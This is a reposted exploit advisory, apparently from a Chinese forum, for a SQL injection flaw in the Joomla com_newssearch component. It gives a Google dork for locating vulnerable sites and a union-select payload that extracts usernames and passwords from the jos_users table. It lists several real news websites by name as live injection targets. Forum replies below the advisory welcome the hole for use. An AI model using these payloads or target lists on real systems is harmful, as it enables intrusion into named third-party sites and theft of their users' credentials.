Joomla Components com_newssearch SQL Injection
########
# Exploit Title: Joomla Components com_newssearch SQL Injection Vulnerability
# Author: Cloudx
# Facebook Profile: [url]www.fb.me/cloudmrx[/url]
# Web Site : [url]www.tifa-team.com[/url]
# Category:: webapps
# Google Dork: inurl:"com_newssearch" & "cid="
# platform : php
# Vendor: None
# Download : Search Here > [url]http://extensions.joomla.org/[/url] <
# Version: All versions
# Security Risk : High
# Tested on: [Windows 8 64bit ]
########
========================
1)Vulnerability Description
2)Exploit
3)Real.Demo
1)Vulnerability Description
===========================
U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
2)Exploit
=========
http://Localhost/{Path}/index.php?option=com_newssearch&type=list§ion=1&cid=-1
Exploit .demo
=========
[url]http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=-null+union+select+1[/url],1,group_concat(username,0x3a,password)+from+jos_users--+Cloudx
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/index.php?option=com_newssearch&type=list§ion=1&cid=[Number] <<-----|
[~] D3m0 [~] :
=============
[url]http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=25[/url][Inj3ct Here]
[url]http://www.hebronjournalregister.com/index.php?option=com_newssearch&type=list§ion=1&cid=22[/url][Inj3ct Here]
[url]http://www.wpnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=28[/url][Inj3ct Here]
Many Websites are Affected On SQL inJection
.
.
.
####
=================================**TIFA-Team**===============================================
# Greets To :
TIFA-Team & Palestine <3 & Syria <3 & Dr.Freedom & **All Muslims**
TIFA --> T = This , I = Is , F = For , A = Allah
=============================================================================================
原文地址:
http://www.1337day.com/exploit/20970
评论7次
谁测试成功过??
mark下,不是经常遇到
joomla我觉得很难入侵..
不碉
正需要这个洞,感谢
国外好多站都用joomla,但是好久都不出poc了
好屌 的中学生